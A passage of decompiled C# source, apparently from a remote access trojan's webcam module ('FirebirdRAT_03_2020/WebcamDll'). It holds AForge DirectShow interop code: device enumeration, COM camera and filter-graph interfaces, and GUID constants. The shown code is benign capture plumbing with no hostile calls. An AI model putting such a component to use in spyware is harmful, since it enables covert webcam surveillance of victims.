35 | 				Type typeFromCLSID = Type.GetTypeFromCLSID(Clsid.SystemDeviceEnum);
36 | 				if (typeFromCLSID == null)
37 | 				{
38 | 					throw new ApplicationException("Failed creating device enumerator");
39 | 				}
40 | 				obj = Activator.CreateInstance(typeFromCLSID);
41 | 				if (((ICreateDevEnum)obj).CreateClassEnumerator(ref category, out enumMoniker, 0) != 0)
42 | 				{
43 | 					throw new ApplicationException("No devices of the category");
44 | 				}
45 | 				IntPtr zero = IntPtr.Zero;
46 | 				while (enumMoniker.Next(1, array, zero) == 0 && array[0] != null)
47 | 				{
48 | 					FilterInfo value = new FilterInfo(array[0]);
49 | 					base.InnerList.Add(value);
50 | 					Marshal.ReleaseComObject(array[0]);
51 | 					array[0] = null;
52 | 				}
53 | 				base.InnerList.Sort();
54 | 			}
55 | 			catch
56 | 			{
57 | 			}
58 | 			finally
59 | 			{
60 | 				if (obj != null)
61 | 				{
62 | 					Marshal.ReleaseComObject(obj);
63 | 					obj = null;
64 | 				}
65 | 				if (enumMoniker != null)
66 | 				{
67 | 					Marshal.ReleaseComObject(enumMoniker);
68 | 					enumMoniker = null;
69 | 				}
70 | 				if (array[0] != null)
71 | 				{
72 | 					Marshal.ReleaseComObject(array[0]);
73 | 					array[0] = null;
74 | 				}
75 | 			}
76 | 		}
77 | 	}
78 | }
79 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/AMMediaType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000026 RID: 38
 7 | 	[ComVisible(false)]
 8 | 	[StructLayout(LayoutKind.Sequential)]
 9 | 	internal class AMMediaType : IDisposable
10 | 	{
11 | 		// Token: 0x060000D5 RID: 213 RVA: 0x00003844 File Offset: 0x00001A44
12 | 		~AMMediaType()
13 | 		{
14 | 			this.Dispose(false);
15 | 		}
16 | 
17 | 		// Token: 0x060000D6 RID: 214 RVA: 0x00003874 File Offset: 0x00001A74
18 | 		public void Dispose()
19 | 		{
20 | 			this.Dispose(true);
21 | 			GC.SuppressFinalize(this);
22 | 		}
23 | 
24 | 		// Token: 0x060000D7 RID: 215 RVA: 0x00003884 File Offset: 0x00001A84
25 | 		protected virtual void Dispose(bool disposing)
26 | 		{
27 | 			if (this.FormatSize != 0 && this.FormatPtr != IntPtr.Zero)
28 | 			{
29 | 				Marshal.FreeCoTaskMem(this.FormatPtr);
30 | 				this.FormatSize = 0;
31 | 			}
32 | 			if (this.unkPtr != IntPtr.Zero)
33 | 			{
34 | 				Marshal.Release(this.unkPtr);
35 | 				this.unkPtr = IntPtr.Zero;
36 | 			}
37 | 		}
38 | 
39 | 		// Token: 0x0400003B RID: 59
40 | 		public Guid MajorType;
41 | 
42 | 		// Token: 0x0400003C RID: 60
43 | 		public Guid SubType;
44 | 
45 | 		// Token: 0x0400003D RID: 61
46 | 		[MarshalAs(UnmanagedType.Bool)]
47 | 		public bool FixedSizeSamples = true;
48 | 
49 | 		// Token: 0x0400003E RID: 62
50 | 		[MarshalAs(UnmanagedType.Bool)]
51 | 		public bool TemporalCompression;
52 | 
53 | 		// Token: 0x0400003F RID: 63
54 | 		public int SampleSize = 1;
55 | 
56 | 		// Token: 0x04000040 RID: 64
57 | 		public Guid FormatType;
58 | 
59 | 		// Token: 0x04000041 RID: 65
60 | 		public IntPtr unkPtr;
61 | 
62 | 		// Token: 0x04000042 RID: 66
63 | 		public int FormatSize;
64 | 
65 | 		// Token: 0x04000043 RID: 67
66 | 		public IntPtr FormatPtr;
67 | 	}
68 | }
69 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/AnalogVideoStandard.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200002F RID: 47
 7 | 	[Flags]
 8 | 	[ComVisible(false)]
 9 | 	internal enum AnalogVideoStandard
10 | 	{
11 | 		// Token: 0x0400006F RID: 111
12 | 		None = 0,
13 | 		// Token: 0x04000070 RID: 112
14 | 		NTSC_M = 1,
15 | 		// Token: 0x04000071 RID: 113
16 | 		NTSC_M_J = 2,
17 | 		// Token: 0x04000072 RID: 114
18 | 		NTSC_433 = 4,
19 | 		// Token: 0x04000073 RID: 115
20 | 		PAL_B = 16,
21 | 		// Token: 0x04000074 RID: 116
22 | 		PAL_D = 32,
23 | 		// Token: 0x04000075 RID: 117
24 | 		PAL_G = 64,
25 | 		// Token: 0x04000076 RID: 118
26 | 		PAL_H = 128,
27 | 		// Token: 0x04000077 RID: 119
28 | 		PAL_I = 256,
29 | 		// Token: 0x04000078 RID: 120
30 | 		PAL_M = 512,
31 | 		// Token: 0x04000079 RID: 121
32 | 		PAL_N = 1024,
33 | 		// Token: 0x0400007A RID: 122
34 | 		PAL_60 = 2048,
35 | 		// Token: 0x0400007B RID: 123
36 | 		SECAM_B = 4096,
37 | 		// Token: 0x0400007C RID: 124
38 | 		SECAM_D = 8192,
39 | 		// Token: 0x0400007D RID: 125
40 | 		SECAM_G = 16384,
41 | 		// Token: 0x0400007E RID: 126
42 | 		SECAM_H = 32768,
43 | 		// Token: 0x0400007F RID: 127
44 | 		SECAM_K = 65536,
45 | 		// Token: 0x04000080 RID: 128
46 | 		SECAM_K1 = 131072,
47 | 		// Token: 0x04000081 RID: 129
48 | 		SECAM_L = 262144,
49 | 		// Token: 0x04000082 RID: 130
50 | 		SECAM_L1 = 524288,
51 | 		// Token: 0x04000083 RID: 131
52 | 		PAL_N_COMBO = 1048576
53 | 	}
54 | }
55 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/BitmapInfoHeader.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200002B RID: 43
 7 | 	[ComVisible(false)]
 8 | 	[StructLayout(LayoutKind.Sequential, Pack = 2)]
 9 | 	internal struct BitmapInfoHeader
10 | 	{
11 | 		// Token: 0x0400005B RID: 91
12 | 		public int Size;
13 | 
14 | 		// Token: 0x0400005C RID: 92
15 | 		public int Width;
16 | 
17 | 		// Token: 0x0400005D RID: 93
18 | 		public int Height;
19 | 
20 | 		// Token: 0x0400005E RID: 94
21 | 		public short Planes;
22 | 
23 | 		// Token: 0x0400005F RID: 95
24 | 		public short BitCount;
25 | 
26 | 		// Token: 0x04000060 RID: 96
27 | 		public int Compression;
28 | 
29 | 		// Token: 0x04000061 RID: 97
30 | 		public int ImageSize;
31 | 
32 | 		// Token: 0x04000062 RID: 98
33 | 		public int XPelsPerMeter;
34 | 
35 | 		// Token: 0x04000063 RID: 99
36 | 		public int YPelsPerMeter;
37 | 
38 | 		// Token: 0x04000064 RID: 100
39 | 		public int ColorsUsed;
40 | 
41 | 		// Token: 0x04000065 RID: 101
42 | 		public int ColorsImportant;
43 | 	}
44 | }
45 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/CAUUID.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200002D RID: 45
 7 | 	[ComVisible(false)]
 8 | 	internal struct CAUUID
 9 | 	{
10 | 		// Token: 0x0400006A RID: 106
11 | 		public int cElems;
12 | 
13 | 		// Token: 0x0400006B RID: 107
14 | 		public IntPtr pElems;
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/Clsid.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000032 RID: 50
 7 | 	[ComVisible(false)]
 8 | 	internal static class Clsid
 9 | 	{
10 | 		// Token: 0x0400009E RID: 158
11 | 		public static readonly Guid SystemDeviceEnum = new Guid(1656642832, 24811, 4560, 189, 59, 0, 160, 201, 17, 206, 134);
12 | 
13 | 		// Token: 0x0400009F RID: 159
14 | 		public static readonly Guid FilterGraph = new Guid(3828804531u, 21071, 4558, 159, 83, 0, 32, 175, 11, 167, 112);
15 | 
16 | 		// Token: 0x040000A0 RID: 160
17 | 		public static readonly Guid SampleGrabber = new Guid(3253993632u, 16136, 4563, 159, 11, 0, 96, 8, 3, 158, 55);
18 | 
19 | 		// Token: 0x040000A1 RID: 161
20 | 		public static readonly Guid CaptureGraphBuilder2 = new Guid(3213342433u, 35879, 4560, 179, 240, 0, 170, 0, 55, 97, 197);
21 | 	}
22 | }
23 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/DsEvCode.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video.DirectShow.Internals
 4 | {
 5 | 	// Token: 0x0200002E RID: 46
 6 | 	internal enum DsEvCode
 7 | 	{
 8 | 		// Token: 0x0400006D RID: 109
 9 | 		DeviceLost = 31
10 | 	}
11 | }
12 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/FilterInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000028 RID: 40
 7 | 	[ComVisible(false)]
 8 | 	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode, Pack = 1)]
 9 | 	internal struct FilterInfo
10 | 	{
11 | 		// Token: 0x04000047 RID: 71
12 | 		[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
13 | 		public string Name;
14 | 
15 | 		// Token: 0x04000048 RID: 72
16 | 		public IFilterGraph FilterGraph;
17 | 	}
18 | }
19 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/FindDirection.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000037 RID: 55
 7 | 	[ComVisible(false)]
 8 | 	internal static class FindDirection
 9 | 	{
10 | 		// Token: 0x040000A8 RID: 168
11 | 		public static readonly Guid UpstreamOnly = new Guid(2893646816u, 39139, 4561, 179, 241, 0, 170, 0, 55, 97, 197);
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/FormatType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000033 RID: 51
 7 | 	[ComVisible(false)]
 8 | 	internal static class FormatType
 9 | 	{
10 | 		// Token: 0x040000A2 RID: 162
11 | 		public static readonly Guid VideoInfo = new Guid(89694080u, 50006, 4558, 191, 1, 0, 170, 0, 85, 89, 90);
12 | 
13 | 		// Token: 0x040000A3 RID: 163
14 | 		public static readonly Guid VideoInfo2 = new Guid(4146755232u, 60170, 4560, 172, 228, 0, 0, 192, 204, 22, 186);
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IAMCameraControl.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000011 RID: 17
 7 | 	[Guid("C6E13370-30AC-11d0-A18C-00A0C9118956")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IAMCameraControl
11 | 	{
12 | 		// Token: 0x0600004B RID: 75
13 | 		[PreserveSig]
14 | 		int GetRange(out int pMin, out int pMax, out int pSteppingDelta, out int pDefault);
15 | 
16 | 		// Token: 0x0600004C RID: 76
17 | 		[PreserveSig]
18 | 		int Set1([In] int lValue);
19 | 
20 | 		// Token: 0x0600004D RID: 77
21 | 		[PreserveSig]
22 | 		int Get1(out int lValue);
23 | 	}
24 | }
25 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IAMCrossbar.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | using System.Security;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000012 RID: 18
 8 | 	[SuppressUnmanagedCodeSecurity]
 9 | 	[Guid("C6E13380-30AC-11D0-A18C-00A0C9118956")]
10 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
11 | 	[ComImport]
12 | 	internal interface IAMCrossbar
13 | 	{
14 | 		// Token: 0x0600004E RID: 78
15 | 		[PreserveSig]
16 | 		int get_PinCounts(out int outputPinCount, out int inputPinCount);
17 | 
18 | 		// Token: 0x0600004F RID: 79
19 | 		[PreserveSig]
20 | 		int CanRoute([In] int outputPinIndex, [In] int inputPinIndex);
21 | 
22 | 		// Token: 0x06000050 RID: 80
23 | 		[PreserveSig]
24 | 		int Route([In] int outputPinIndex, [In] int inputPinIndex);
25 | 
26 | 		// Token: 0x06000051 RID: 81
27 | 		[PreserveSig]
28 | 		int get_IsRoutedTo([In] int outputPinIndex, out int inputPinIndex);
29 | 
30 | 		// Token: 0x06000052 RID: 82
31 | 		[PreserveSig]
32 | 		int get_CrossbarPinInfo([MarshalAs(UnmanagedType.Bool)] [In] bool isInputPin, [In] int pinIndex, out int pinIndexRelated, out PhysicalConnectorType physicalType);
33 | 	}
34 | }
35 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IAMStreamConfig.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000013 RID: 19
 7 | 	[Guid("C6E13340-30AC-11d0-A18C-00A0C9118956")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IAMStreamConfig
11 | 	{
12 | 		// Token: 0x06000053 RID: 83
13 | 		[PreserveSig]
14 | 		int SetFormat([MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
15 | 
16 | 		// Token: 0x06000054 RID: 84
17 | 		[PreserveSig]
18 | 		int GetFormat([MarshalAs(UnmanagedType.LPStruct)] out AMMediaType mediaType);
19 | 
20 | 		// Token: 0x06000055 RID: 85
21 | 		[PreserveSig]
22 | 		int GetNumberOfCapabilities(out int count, out int size);
23 | 
24 | 		// Token: 0x06000056 RID: 86
25 | 		[PreserveSig]
26 | 		int GetStreamCaps([In] int index, [MarshalAs(UnmanagedType.LPStruct)] out AMMediaType mediaType, [MarshalAs(UnmanagedType.LPStruct)] [In] VideoStreamConfigCaps streamConfigCaps);
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IAMVideoControl.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Drawing;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000014 RID: 20
 8 | 	[Guid("6A2E0670-28E4-11D0-A18c-00A0C9118956")]
 9 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
10 | 	[ComImport]
11 | 	internal interface IAMVideoControl
12 | 	{
13 | 		// Token: 0x06000057 RID: 87
14 | 		[PreserveSig]
15 | 		int GetCaps([In] IPin pin, [MarshalAs(UnmanagedType.I4)] out VideoControlFlags flags);
16 | 
17 | 		// Token: 0x06000058 RID: 88
18 | 		[PreserveSig]
19 | 		int SetMode([In] IPin pin, [MarshalAs(UnmanagedType.I4)] [In] VideoControlFlags mode);
20 | 
21 | 		// Token: 0x06000059 RID: 89
22 | 		[PreserveSig]
23 | 		int GetMode([In] IPin pin, [MarshalAs(UnmanagedType.I4)] out VideoControlFlags mode);
24 | 
25 | 		// Token: 0x0600005A RID: 90
26 | 		[PreserveSig]
27 | 		int GetCurrentActualFrameRate([In] IPin pin, [MarshalAs(UnmanagedType.I8)] out long actualFrameRate);
28 | 
29 | 		// Token: 0x0600005B RID: 91
30 | 		[PreserveSig]
31 | 		int GetMaxAvailableFrameRate([In] IPin pin, [In] int index, [In] Size dimensions, out long maxAvailableFrameRate);
32 | 
33 | 		// Token: 0x0600005C RID: 92
34 | 		[PreserveSig]
35 | 		int GetFrameRateList([In] IPin pin, [In] int index, [In] Size dimensions, out int listSize, out IntPtr frameRate);
36 | 	}
37 | }
38 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IBaseFilter.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000015 RID: 21
 7 | 	[Guid("56A86895-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IBaseFilter
11 | 	{
12 | 		// Token: 0x0600005D RID: 93
13 | 		[PreserveSig]
14 | 		int GetClassID(out Guid ClassID);
15 | 
16 | 		// Token: 0x0600005E RID: 94
17 | 		[PreserveSig]
18 | 		int Stop1();
19 | 
20 | 		// Token: 0x0600005F RID: 95
21 | 		[PreserveSig]
22 | 		int Pause();
23 | 
24 | 		// Token: 0x06000060 RID: 96
25 | 		[PreserveSig]
26 | 		int Run(long start);
27 | 
28 | 		// Token: 0x06000061 RID: 97
29 | 		[PreserveSig]
30 | 		int GetState(int milliSecsTimeout, out int filterState);
31 | 
32 | 		// Token: 0x06000062 RID: 98
33 | 		[PreserveSig]
34 | 		int SetSyncSource([In] IntPtr clock);
35 | 
36 | 		// Token: 0x06000063 RID: 99
37 | 		[PreserveSig]
38 | 		int GetSyncSource(out IntPtr clock);
39 | 
40 | 		// Token: 0x06000064 RID: 100
41 | 		[PreserveSig]
42 | 		int EnumPins(out IEnumPins enumPins1);
43 | 
44 | 		// Token: 0x06000065 RID: 101
45 | 		[PreserveSig]
46 | 		int FindPin([MarshalAs(UnmanagedType.LPWStr)] [In] string id, out IPin pin);
47 | 
48 | 		// Token: 0x06000066 RID: 102
49 | 		[PreserveSig]
50 | 		int QueryFilterInfo(out FilterInfo filterInfo);
51 | 
52 | 		// Token: 0x06000067 RID: 103
53 | 		[PreserveSig]
54 | 		int JoinFilterGraph([In] IFilterGraph graph, [MarshalAs(UnmanagedType.LPWStr)] [In] string name);
55 | 
56 | 		// Token: 0x06000068 RID: 104
57 | 		[PreserveSig]
58 | 		int QueryVendorInfo([MarshalAs(UnmanagedType.LPWStr)] out string vendorInfo);
59 | 	}
60 | }
61 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/ICreateDevEnum.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | using System.Runtime.InteropServices.ComTypes;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000017 RID: 23
 8 | 	[Guid("29840822-5B84-11D0-BD3B-00A0C911CE86")]
 9 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
10 | 	[ComImport]
11 | 	internal interface ICreateDevEnum
12 | 	{
13 | 		// Token: 0x06000072 RID: 114
14 | 		[PreserveSig]
15 | 		int CreateClassEnumerator([In] ref Guid type, out IEnumMoniker enumMoniker, [In] int flags);
16 | 	}
17 | }
18 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IEnumFilters.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000018 RID: 24
 7 | 	[Guid("56A86893-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IEnumFilters
11 | 	{
12 | 		// Token: 0x06000073 RID: 115
13 | 		[PreserveSig]
14 | 		int Next1([In] int cFilters, [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 0)] [Out] IBaseFilter[] filters, out int filtersFetched);
15 | 
16 | 		// Token: 0x06000074 RID: 116
17 | 		[PreserveSig]
18 | 		int Skip([In] int cFilters);
19 | 
20 | 		// Token: 0x06000075 RID: 117
21 | 		[PreserveSig]
22 | 		int Reset();
23 | 
24 | 		// Token: 0x06000076 RID: 118
25 | 		[PreserveSig]
26 | 		int Clone(out IEnumFilters enumFilters);
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IEnumPins.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000019 RID: 25
 7 | 	[Guid("56A86892-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IEnumPins
11 | 	{
12 | 		// Token: 0x06000077 RID: 119
13 | 		[PreserveSig]
14 | 		int Next1([In] int cPins, [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 0)] [Out] IPin[] pins, out int pinsFetched);
15 | 
16 | 		// Token: 0x06000078 RID: 120
17 | 		[PreserveSig]
18 | 		int Skip([In] int cPins);
19 | 
20 | 		// Token: 0x06000079 RID: 121
21 | 		[PreserveSig]
22 | 		int Reset();
23 | 
24 | 		// Token: 0x0600007A RID: 122
25 | 		[PreserveSig]
26 | 		int Clone(out IEnumPins enumPins);
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IFilterGraph.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200001A RID: 26
 7 | 	[Guid("56A8689F-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IFilterGraph
11 | 	{
12 | 		// Token: 0x0600007B RID: 123
13 | 		[PreserveSig]
14 | 		int AddFilter([In] IBaseFilter filter, [MarshalAs(UnmanagedType.LPWStr)] [In] string name);
15 | 
16 | 		// Token: 0x0600007C RID: 124
17 | 		[PreserveSig]
18 | 		int RemoveFilter([In] IBaseFilter filter);
19 | 
20 | 		// Token: 0x0600007D RID: 125
21 | 		[PreserveSig]
22 | 		int EnumFilters(out IntPtr enumerator);
23 | 
24 | 		// Token: 0x0600007E RID: 126
25 | 		[PreserveSig]
26 | 		int FindFilterByName([MarshalAs(UnmanagedType.LPWStr)] [In] string name, out IBaseFilter filter);
27 | 
28 | 		// Token: 0x0600007F RID: 127
29 | 		[PreserveSig]
30 | 		int ConnectDirect([In] IPin pinOut, [In] IPin pinIn, [MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
31 | 
32 | 		// Token: 0x06000080 RID: 128
33 | 		[PreserveSig]
34 | 		int Reconnect([In] IPin pin);
35 | 
36 | 		// Token: 0x06000081 RID: 129
37 | 		[PreserveSig]
38 | 		int Disconnect([In] IPin pin);
39 | 
40 | 		// Token: 0x06000082 RID: 130
41 | 		[PreserveSig]
42 | 		int SetDefaultSyncSource();
43 | 	}
44 | }
45 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IGraphBuilder.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200001C RID: 28
 7 | 	[Guid("56A868A9-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IGraphBuilder
11 | 	{
12 | 		// Token: 0x06000095 RID: 149
13 | 		[PreserveSig]
14 | 		int AddFilter([In] IBaseFilter filter, [MarshalAs(UnmanagedType.LPWStr)] [In] string name);
15 | 
16 | 		// Token: 0x06000096 RID: 150
17 | 		[PreserveSig]
18 | 		int RemoveFilter([In] IBaseFilter filter);
19 | 
20 | 		// Token: 0x06000097 RID: 151
21 | 		[PreserveSig]
22 | 		int EnumFilters(out IEnumFilters enumerator);
23 | 
24 | 		// Token: 0x06000098 RID: 152
25 | 		[PreserveSig]
26 | 		int FindFilterByName([MarshalAs(UnmanagedType.LPWStr)] [In] string name, out IBaseFilter filter);
27 | 
28 | 		// Token: 0x06000099 RID: 153
29 | 		[PreserveSig]
30 | 		int ConnectDirect([In] IPin pinOut, [In] IPin pinIn, [MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
31 | 
32 | 		// Token: 0x0600009A RID: 154
33 | 		[PreserveSig]
34 | 		int Reconnect([In] IPin pin);
35 | 
36 | 		// Token: 0x0600009B RID: 155
37 | 		[PreserveSig]
38 | 		int Disconnect([In] IPin pin);
39 | 
40 | 		// Token: 0x0600009C RID: 156
41 | 		[PreserveSig]
42 | 		int SetDefaultSyncSource();
43 | 
44 | 		// Token: 0x0600009D RID: 157
45 | 		[PreserveSig]
46 | 		int Connect([In] IPin pinOut, [In] IPin pinIn);
47 | 
48 | 		// Token: 0x0600009E RID: 158
49 | 		[PreserveSig]
50 | 		int Render([In] IPin pinOut);
51 | 
52 | 		// Token: 0x0600009F RID: 159
53 | 		[PreserveSig]
54 | 		int RenderFile([MarshalAs(UnmanagedType.LPWStr)] [In] string file, [MarshalAs(UnmanagedType.LPWStr)] [In] string playList);
55 | 
56 | 		// Token: 0x060000A0 RID: 160
57 | 		[PreserveSig]
58 | 		int AddSourceFilter([MarshalAs(UnmanagedType.LPWStr)] [In] string fileName, [MarshalAs(UnmanagedType.LPWStr)] [In] string filterName, out IBaseFilter filter);
59 | 
60 | 		// Token: 0x060000A1 RID: 161
61 | 		[PreserveSig]
62 | 		int SetLogFile(IntPtr hFile);
63 | 
64 | 		// Token: 0x060000A2 RID: 162
65 | 		[PreserveSig]
66 | 		int Abort();
67 | 
68 | 		// Token: 0x060000A3 RID: 163
69 | 		[PreserveSig]
70 | 		int ShouldOperationContinue();
71 | 	}
72 | }
73 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IMediaControl.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200001D RID: 29
 7 | 	[Guid("56A868B1-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsDual)]
 9 | 	[ComImport]
10 | 	internal interface IMediaControl
11 | 	{
12 | 		// Token: 0x060000A4 RID: 164
13 | 		[PreserveSig]
14 | 		int Run();
15 | 
16 | 		// Token: 0x060000A5 RID: 165
17 | 		[PreserveSig]
18 | 		int Pause();
19 | 
20 | 		// Token: 0x060000A6 RID: 166
21 | 		[PreserveSig]
22 | 		int Stop1();
23 | 
24 | 		// Token: 0x060000A7 RID: 167
25 | 		[PreserveSig]
26 | 		int GetState(int timeout, out int filterState);
27 | 
28 | 		// Token: 0x060000A8 RID: 168
29 | 		[PreserveSig]
30 | 		int RenderFile(string fileName);
31 | 
32 | 		// Token: 0x060000A9 RID: 169
33 | 		[PreserveSig]
34 | 		int AddSourceFilter([In] string fileName, [MarshalAs(UnmanagedType.IDispatch)] out object filterInfo);
35 | 
36 | 		// Token: 0x060000AA RID: 170
37 | 		[PreserveSig]
38 | 		int get_FilterCollection([MarshalAs(UnmanagedType.IDispatch)] out object collection);
39 | 
40 | 		// Token: 0x060000AB RID: 171
41 | 		[PreserveSig]
42 | 		int get_RegFilterCollection([MarshalAs(UnmanagedType.IDispatch)] out object collection);
43 | 
44 | 		// Token: 0x060000AC RID: 172
45 | 		[PreserveSig]
46 | 		int StopWhenReady();
47 | 	}
48 | }
49 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IMediaEventEx.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
